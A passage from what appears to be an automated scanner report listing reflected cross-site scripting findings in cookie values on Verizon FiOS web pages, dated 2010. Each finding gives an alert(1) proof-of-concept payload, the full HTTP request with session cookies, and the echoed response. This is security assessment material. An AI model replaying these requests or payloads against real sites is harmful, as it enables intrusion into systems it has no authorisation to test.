The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 9afbe<script>alert(1)</script>42141e4a677 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX9afbe<script>alert(1)</script>42141e4a677; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119106
Expires: Sat, 20 Nov 2010 02:57:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX9afbe<script>alert(1)</script>42141e4a677; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9AFBE<SCRIPT>ALERT(1)</SCRIPT>42141E4A677 </DIV>
...[SNIP]...

3.267. https://www22.verizon.com/Residential/FiOSInternet/ [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adc43"-alert(1)-"8aa6b87ac33 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=adc43"-alert(1)-"8aa6b87ac33; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 125619
Expires: Sat, 20 Nov 2010 02:57:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "adc43"-alert(1)-"8aa6b87ac33"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: docu
...[SNIP]...

3.268. https://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72a2a'><script>alert(1)</script>3f33f50afae was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX72a2a'><script>alert(1)</script>3f33f50afae; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58779
Expires: Sat, 20 Nov 2010 02:55:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX72a2a'><script>alert(1)</script>3f33f50afae; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FiOS Internet | Check Availability
</title><meta name="keywords" content="fios internet check availability, fios availability, fios check
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX72A2A'><SCRIPT>ALERT(1)</SCRIPT>3F33F50AFAE ' />
...[SNIP]...

3.269. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 8b27c<script>alert(1)</script>9b933fecabb was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX8b27c<script>alert(1)</script>9b933fecabb; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119132
Expires: Sat, 20 Nov 2010 02:58:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:58:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:58:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX8b27c<script>alert(1)</script>9b933fecabb; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:58:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:58:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:58:30 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8B27C<SCRIPT>ALERT(1)</SCRIPT>9B933FECABB </DIV>
...[SNIP]...

3.270. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 429f7'><script>alert(1)</script>ffc246269ca was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
